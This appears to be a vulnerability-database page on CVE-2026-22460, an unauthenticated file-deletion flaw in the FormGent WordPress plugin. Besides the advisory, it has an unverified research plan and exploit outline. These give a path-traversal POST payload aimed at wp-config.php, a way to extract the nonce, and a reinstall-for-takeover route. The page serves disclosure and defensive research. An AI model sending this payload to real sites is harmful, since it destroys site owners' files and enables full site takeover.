WP-Safety
CVE-2026-22460

FormGent – Next-Gen AI Form Builder for WordPress with Multi-Step, Quizzes, Payments & More <= 1.4.2 - Unauthenticated Arbitrary File Deletion

criticalImproper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
9.1
CVSS Score
9.1
CVSS Score
critical
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The FormGent – Next-Gen AI Form Builder for WordPress with Multi-Step, Quizzes, Payments & More plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in a function in all versions up to, and including, 1.4.2. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=1.4.2
PublishedMarch 3, 2026
Last updatedMarch 25, 2026
Affected pluginformgent
Research Plan
Unverified

This research plan outlines the steps to investigate and exploit **CVE-2026-22460**, an unauthenticated arbitrary file deletion vulnerability in the **FormGent** WordPress plugin (<= 1.4.2). ### 1. Vulnerability Summary The FormGent plugin fails to properly validate file paths in an unauthenticated…

Show full research plan

This research plan outlines the steps to investigate and exploit CVE-2026-22460, an unauthenticated arbitrary file deletion vulnerability in the FormGent WordPress plugin (<= 1.4.2).

1. Vulnerability Summary

The FormGent plugin fails to properly validate file paths in an unauthenticated AJAX or REST API handler. By using path traversal sequences (e.g., ../../), an attacker can supply a path to any file on the server (such as wp-config.php) to a function that performs a file deletion (likely unlink()). Deleting wp-config.php forces WordPress into its setup state, allowing an attacker to re-install the site and achieve Remote Code Execution (RCE).

2. Attack Vector Analysis

  • Endpoint: WordPress AJAX (/wp-admin/admin-ajax.php) or REST API.
  • Hook (Inferred): wp_ajax_nopriv_formgent_delete_file or wp_ajax_nopriv_formgent_remove_upload.
  • Vulnerable Parameter: Likely file_path, file, or path.
  • Authentication: None required (unauthenticated).
  • Preconditions:
    • The plugin must be active.
    • A valid nonce may be required if the wp_ajax_nopriv handler enforces check_ajax_referer.

3. Code Flow (Inferred)

  1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with an action registered via add_action( 'wp_ajax_nopriv_...', ... ).
  2. Processing: The handler function retrieves a file path from the $_POST or $_REQUEST array.
  3. Vulnerability: The function fails to validate that the path remains within the intended uploads directory. It does not strip ../ or check the final resolved path.
  4. Sink: The unsanitized path is passed to unlink() or wp_delete_file().

4. Nonce Acquisition Strategy

If the handler requires a nonce, it is typically localized into the frontend scripts when a FormGent form is rendered.

  1. Identify Shortcode: Search the plugin code for add_shortcode.
    • Action: grep -rn "add_shortcode" /var/www/html/wp-content/plugins/formgent/
    • Inferred Shortcode: [formgent id="1"]
  2. Create a Page: Use WP-CLI to create a page containing the shortcode to trigger the script loading.
    • Command: wp post create --post_type=page --post_title="Form Page" --post_status=publish --post_content='[formgent id="1"]'
  3. Extract Nonce via Browser:
    • Navigate to the newly created page.
    • Use browser_eval to find the localization object. Look for wp_localize_script calls in the source.
    • Common Variable (Inferred): window.formgent_vars?.nonce or window.formgent_ajax?.nonce.
    • Command: browser_eval("window.formgent_vars?.nonce")

5. Exploitation Strategy

Once the endpoint and nonce (if needed) are identified:

  1. Identify Target: Target a non-critical file first (e.g., wp-content/uploads/test.txt) to prove the vulnerability without breaking the environment.
  2. Prepare Payload: Construct a path traversal string.
    • If the plugin appends the input to a base directory like /wp-content/plugins/formgent/uploads/, the payload would be ../../../../wp-config.php.
  3. Construct Request:
    • Method: POST
    • URL: http://localhost:8080/wp-admin/admin-ajax.php
    • Headers: Content-Type: application/x-www-form-urlencoded
    • Body: action=formgent_delete_file&nonce=[NONCE]&file=../../../../wp-config.php (Adjust parameter names based on discovery).

6. Test Data Setup

  1. Plugin Installation: Ensure FormGent <= 1.4.2 is installed.
  2. Create Dummy File: Create a file in the WordPress root to test deletion safely.
    • Command: wp eval 'file_put_contents(ABSPATH . "poc.txt", "delete me");'
  3. Create Form: If the plugin requires an existing form to render the shortcode, create one via the admin UI or WP-CLI (if supported).

7. Expected Results

  • Success: The HTTP response should indicate success (e.g., {"success":true} or a 1).
  • Impact: The file poc.txt in the root directory should be deleted from the filesystem.

8. Verification Steps

  1. Check Filesystem:
    • Command: ls /var/www/html/poc.txt
    • Expected Output: ls: cannot access '/var/www/html/poc.txt': No such file or directory
  2. Verify via PHP:
    • Command: wp eval 'echo file_exists(ABSPATH . "poc.txt") ? "Exists" : "Deleted";'

9. Alternative Approaches

  • Path Variations: If ../../../../wp-config.php fails, try absolute paths (e.g., /var/www/html/wp-config.php) if the plugin does not prepend a base path.
  • Parameter Fuzzing: If the parameter name is not obvious, use grep -r "unlink" /var/www/html/wp-content/plugins/formgent/ to identify the exact function and parameter name.
  • REST API: Check for registered REST routes using grep -r "register_rest_route". If a route exists for file deletion without a permission_callback, it may be easier to exploit than the AJAX endpoint.
Research Findings
Static analysis — not yet PoC-verified

Summary

The FormGent plugin for WordPress (<= 1.4.2) contains an unauthenticated arbitrary file deletion vulnerability due to insufficient validation of file paths in its AJAX or REST API handlers. Attackers can use path traversal sequences (e.g., ../../) to delete critical system files such as wp-config.php, potentially leading to remote code execution.

Exploit Outline

1. Identify an unauthenticated AJAX action used for file management, such as formgent_delete_file or formgent_remove_upload. 2. Obtain a valid security nonce if required by inspecting the frontend source code of a page containing a FormGent form, typically localized in a JavaScript object like formgent_vars. 3. Construct a POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to the vulnerable hook. 4. In the file path parameter (e.g., 'file' or 'path'), provide a path traversal string targeting a sensitive file, such as ../../../wp-config.php. 5. Execute the request to delete the file; if wp-config.php is deleted, navigate to the site root to initiate a fresh WordPress installation for full site takeover.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/8cf1889b-c249-4bd7-ae23-2db66ca9d873?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database